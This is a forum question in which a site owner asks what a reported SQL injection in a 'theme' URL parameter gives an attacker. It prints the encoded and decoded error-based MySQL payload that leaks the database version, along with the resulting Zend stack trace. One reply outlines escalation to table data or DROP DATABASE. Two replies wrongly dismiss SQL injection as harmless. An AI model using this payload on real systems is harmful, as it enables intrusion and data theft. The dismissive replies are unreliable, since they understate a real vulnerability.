V
V
Vladislav Startsev2016-01-12 19:54:25
MySQL
Vladislav Startsev, 2016-01-12 19:54:25

What does the following SQL injection give a potential attacker?

They sent a link to a former colleague with SQL injection, recommended to close the vulnerability.
/site/view?page=3§=14&theme=(select%201%20and%20row(1%2c1)%3E(select%20count(*)%2cconcat(concat((select%20version()))%2cfloor( rand()*2))x%20 from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Injection itself:

(select 1 and row(1,1)>(select count(*), concat(concat((select version())), floor(rand()*2))x 
from (select 1 union select 2)a group by x limit 1))

And the site error:
Fatal error: Uncaught exception 'Zend_Db_Statement_Exception' with message 'SQLSTATE[23000]: Integrity constraint violation: 1062 Duplicate entry '5.5.33-0+wheezy1-log1' for key 'group_key'' in /var/ZendFramework -1.0.3/library/Zend/Db/Statement/Pdo.php:227
Stack trace:
#0 /var/ZendFramework-1.0.3/library/Zend/Db/Statement.php(279): Zend_Db_Statement_Pdo->_execute( Array)
#1 /var/ZendFramework-1.0.3/library/Zend/Db/Adapter/Abstract.php(396): Zend_Db_Statement->execute(Array)
#2 /var/ZendFramework-1.0.3/library/Zend/ Db/Adapter/Pdo/Abstract.php(206): Zend_Db_Adapter_Abstract->query('SELECT c.`Name`...', Array)
#3 /var/ZendFramework-1.0.3/library/Zend/Db/Adapter/Abstract.php(693): Zend_Db_Adapter_Pdo_Abstract->query('SELECT c.`Name`...', Array)
#4 /var/ www/pageparts/consultation/org.php(23): Zend_Db_Adapter_Abstract->fetchRow('SELECT c.`Name`...')
#5 /var/www/gorobzor/index.php(264): include('/ var/www/pagepa...')
#6 {main}
thrown in /var/ZendFramework-1.0.3/library/Zend/Db/Statement/Pdo.php on line
227 the problem is in &theme= . the reason is clear, only here ..
Question: What does this give a potential attacker?

Answer the question

In order to leave comments, you need to log in

3 answer(s)
R
Rsa97, 2016-01-12
@Rsa97

This query managed to get the MySQL version (5.5.33-0+wheezy1-log1).
After rewriting the query, you can try to get the names of the tables, then their structure, then the data from these tables. Well, or issue a DROP DATABASE command.

R
romy4, 2016-01-12
@romy4

SQL injections do nothing for attackers. This is just an excuse for the developer to knock money from the customer, leaving such holes.

X
xmoonlight, 2016-01-12
@xmoonlight

this one is absolutely nothing.

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question